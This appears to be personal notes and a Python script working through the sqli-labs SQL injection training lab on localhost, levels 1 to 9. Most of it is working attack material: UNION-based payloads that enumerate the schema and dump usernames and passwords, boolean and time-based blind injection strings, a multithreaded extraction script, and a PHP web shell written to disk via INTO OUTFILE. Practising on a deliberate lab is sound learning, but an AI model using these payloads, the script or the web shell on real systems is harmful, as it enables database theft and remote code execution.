1-5

'''
進資料庫之前還會解碼,SQL 語法中的語句 不會, str需要hex。 
python的hex：先ascii 轉換 再 hex

第一關
CONCAT_WS(sep,s1,s2...,sn)將s1,s2...,sn連線成字串，並用sep字元間隔
concat_ws(@@version,database(),user())
獲取所有資料庫名
select 1,2,(select group_concat(schema_name) from information_schema.schemata)#


得到 基本資訊
union select 1,concat_ws(0x7C,@@version,database(),0x757365722829),3  #
資料庫 hex
0x736563757269747927.
得表名
%27%20union%20select%201,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=0x7365637572697479),3%20%20%20%23
得欄位名
id=-1%27%20union%20select%201,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_name=0x7573657273%20and%20table_schema=0x7365637572697479),3%20%20%20%23

得資料:
’ union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)%23




第三關
id=-1')order by 3 %23
爆欄位
id=-1%27)union%20select%201,2,3%20%23


基本資訊:
id=-1%27)union%20select%201,(select%20concat_ws(database(),@@version,user())),3%20%23

得表名
-1%27)union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479),3%20%23

得欄位名:

id=-1%27)union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273%20and%20table_schema=0x7365637572697479),3


第四關:
爆出欄位
http://127.0.0.1/sqli-labs-master/Less-4/?id=-1") union select 1,2,3 #

然後
(select group_concat(table_name) from information_schema.tables where table_schema=(select database()))

最後 得資料
select group_concat() from
 

6-9

import requests



'''
第6關
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and 0 or (length(database())=8) #
'''



'''
第7關

http://127.0.0.1/sqli-labs-master/Less-7/?id=2%27))%20and%200%20or%20(length(database())=8)%23

'''

'''
第8關 完整
'''
import requests
from multiprocessing.dummy import Pool
messagr=[]
#資料庫
#poc="http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or "+'(ascii(substr((select database()),%d,1))=%d)'

#表名 29
# 29 個http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or (length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=29)#
poc="http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or "+'(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))=%d)'

#列名  20
#http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or (length((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=database()))=122) #
poc="http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or "+'(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=database()),%d,1))=%d)'

#得資料218個欄位
#http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or (length((select group_concat(id,0x7c,username,0x7c,password) from security.users))=218) #
poc="http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or"+' (ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users),%d,1))=%d)'

def expoit(start,num,poc):
    poc=poc.replace('%20',' ')
    poc=poc%(start,num)+'%20%23'
    # print(poc)
    response=requests.get(poc)
    if 'You are in' in response.text:
        messagr.append(chr(num))
        print('資料庫:',''.join(messagr))

def main(starts):
    pool=Pool()
    for start in range(1,starts+1):
        for num in range(31,128):
            pool.apply_async(expoit,args=(start,num,poc))
    pool.close()
    pool.join()

if __name__ == '__main__':
    main(218)

'''
 select "<?php @eval($_POST['giantbranch']);?>" into outfile "XXX\test.php" 
'''



'''
9 10

無回顯，只能sleep()來測試
http://localhost/sqli-labs/Less-9/?id=1' and if(ascii(substr(database(),1,1))>115, 0, sleep(5)) %23 

'''